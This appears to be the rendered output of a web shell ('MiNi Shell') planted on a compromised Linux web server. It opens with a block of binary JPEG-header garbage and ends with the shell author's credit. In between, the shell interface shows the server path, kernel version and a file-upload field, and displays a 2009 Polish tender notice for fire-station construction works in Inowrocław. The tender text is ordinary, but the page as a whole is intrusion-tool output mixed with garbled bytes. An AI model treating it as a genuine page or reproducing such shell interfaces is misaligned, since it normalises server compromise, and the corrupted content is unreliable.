JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090506/135680-N-2009.html

<p class="kh_header"><b>Inowrocław: Roboty budowlane - 5. etap budowy strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo-Gaśniczej Nr 1 
w Inowrocławiu przy ul. Poznańskiej 133, główny kod CPV 45216121-8 Obiekty straży pożarnej, obejmujący wykonanie:
1)	dróg i placów manewrowych z przebudową wjazdów na teren strażnicy,
2)	oświetlenia terenu z rozdzielnią energetyczną,
3)	odbudowę balustrad ochronnych w budowanej strażnicy,
4)	przepustów - rur ochronnych przyłącza gazu i telekomunikacji.</b><br>
<b>Numer ogłoszenia: 135680 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Powiatowa Państwowej Straży Pożarnej , ul. Poznańska 133, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 052 3575021, faks 052 3575021 w.236.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.kppspinowrpclaw.binp.info/kppspinowroclaw/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane - 5. etap budowy strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo-Gaśniczej Nr 1 
w Inowrocławiu przy ul. Poznańskiej 133, główny kod CPV 45216121-8 Obiekty straży pożarnej, obejmujący wykonanie:
1)	dróg i placów manewrowych z przebudową wjazdów na teren strażnicy,
2)	oświetlenia terenu z rozdzielnią energetyczną,
3)	odbudowę balustrad ochronnych w budowanej strażnicy,
4)	przepustów - rur ochronnych przyłącza gazu i telekomunikacji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane 5. etapu budowy strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo-Gaśniczej Nr 1 w Inowrocławiu przy ul. Poznańskiej 133, dalej inwestycji, obejmujące wykonanie następujących części zamówienia:
1)	drogi i place manewrowe z przebudową wjazdów na teren strażnicy 
i wykonaniem bramy wjazdowej od ul. Miechowickiej - powierzchnia 
ok. 2.400 m2;
2)	oświetlenie terenu z rozdzielnią energetyczną - ustawienie i podłączenie słupów oświetleniowych, wykonanie rozdzielni elektrycznej, połączenie istniejącej sieci zalicznikowej nn oświetlenia terenu, uruchomienie oświetlenia;
3)	odbudowa balustrad ochronnych w budowanej strażnicy;
4)	przepusty - rury ochronne przyszłego przyłącza gazu 
i telekomunikacyjnego;
Wymagany okres gwarancji na wykonane roboty budowlane wynosi 
60 miesięcy.
Przedmiot zamówienia szczegółowo opisuje dokumentacja projektowa zał. nr 1 rys. 00-05, specyfikacje techniczne wykonania i odbioru robót budowlanych zał. nr 2 dok. ST1-ST5, pomocniczo przedmiary zał. nr 3 dok. 01-05. Zamawiający udostępni wykonawcy całą posiadaną dokumentację projektową inwestycji. Zamówienie musi zostać wykonane zgodnie z udostępnioną dokumentacją projektową i sztuką budowlaną. Projekt zagospodarowania terenu strażnicy znajduje się w zał. nr 1 rys. 00 zagospodarowanie terenu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.61.21-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
a)	posiadają uprawnienia do wykonywania określonej działalności 
lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - uprawnienia w zakresie prowadzenia robót budowlanych wchodzących w zakres przedmiotu zamówienia;
b)	posiadają niezbędną wiedzę i doświadczenie - w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej 
4 roboty budowlane o przedmiocie i wartości odpowiadającym robotom budowlanym stanowiącym przedmiot zamówienia;
c)	dysponują potencjałem technicznym niezbędnym do wykonania zamówienia;
d)	dysponują osobami zdolnymi do wykonania zamówienia - wykonawca zapewnia kierownika budowy; dysponują osobami posiadającymi odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi stanowiącymi przedmiot zamówienia; dysponują osobami zdolnymi do wykonania zamówienia - robotnikami budowlanymi;
e)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
f)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
na podstawie art. 24 ust. 1 i 2 Pzp.
g)	wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu 
albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
h)	jeżeli oferta wykonawców ubiegających się wspólnie o udzielenie zamówienia zostanie wybrana, zamawiający będzie żądał 
przed zawarciem umowy o udzielenie zamówienia publicznego umowy regulującej współpracę tych wykonawców.
2)	Zamawiający oceni spełnianie przez wykonawców warunków, o których mowa w ust. 1, na podstawie załączonych do oferty dokumentów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)	oświadczenie, że Wykonawca spełnia warunki, o których mowa w art. 22 ust. 1 Prawa zamówień publicznych - załącznik nr 5 do siwz;
b)	w celu potwierdzenia, że wykonawca posiada uprawnienia 
do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp, zamawiający żąda następujących dokumentów: 
- aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, 
jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
- aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
- uprawnień budowlanych, w tym między innymi decyzji o wpisie do centralnego rejestru osób posiadających uprawnienia budowlane, dla uprawnień budowlanych uzyskanych po 3 lipca 2005 r.; 
- zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego, wydanego przez tę izbę z określonym w nim terminem ważności i posiadaniem ubezpieczenia od odpowiedzialności cywilnej w zakresie wykonywanej samodzielnej funkcji technicznej w budownictwie;
c)	w celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje osobami zdolnymi do wykonania zamówienia, zamawiający żąda następujących dokumentów:
- wykazu co najmniej 4 wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - zał. nr 6;
- wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował wykonawca - zał. nr 7;
- wykazu osób, którymi dysponuje lub będzie dysponował wykonawca 
i które będą uczestniczyć w wykonywaniu zamówienia, 
wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, szczególnie wskazanie kierownika budowy i/lub kierowników poszczególnych robót - zał. nr 8;
- stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - szczególnie kierownik budowy i/lub kierownicy robót;
- wykazu części zamówienia, które wykonawca powierzy podwykonawcom, z określeniem-wykazem podwykonawców i załączeniem dokumentów, o których mowa w tirecie powyżej, zgodnie z załącznikiem nr 4;
d)	w celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów;
- polisy, a w przypadku jej braku innego dokumentu potwierdzającego, 
że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, do wysokości szkody co najmniej 800.000 zł; w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnienie wymogu wartości ubezpieczenia traktuje się łącznie.
Dokumenty są składane w formie oryginału lub kopii poświadczonej 
za zgodność z oryginałem przez wykonawcę. W przypadku składania elektronicznych kopii dokumentów powinny być one opatrzone 
przez wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym 
za pomocą ważnego kwalifikowanego certyfikatu. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu 
jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
Dokumenty sporządzone w języku obcym są składane wraz 
z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
Wykonawcy ubiegający się wspólnie o zamówienie składają dokumenty wymienione w p. a i b oddzielnie, każdy w swoim imieniu. Dokumenty wymienione w p. c i d, wykonawcy ubiegający się wspólnie o zamówienie mogą składać wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.kppspinowrpclaw.binp.info/kppspinowroclaw/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Powiatowa Państwowej Straży Pożarnej w Inowrocławiu ul. Poznańska 133, 88-100 Inowrocław.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 10:15, miejsce: Komenda Powiatowa Państwowej Straży Pożarnej w Inowrocławiu ul. Poznańska 133, 88-100 Inowrocław.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com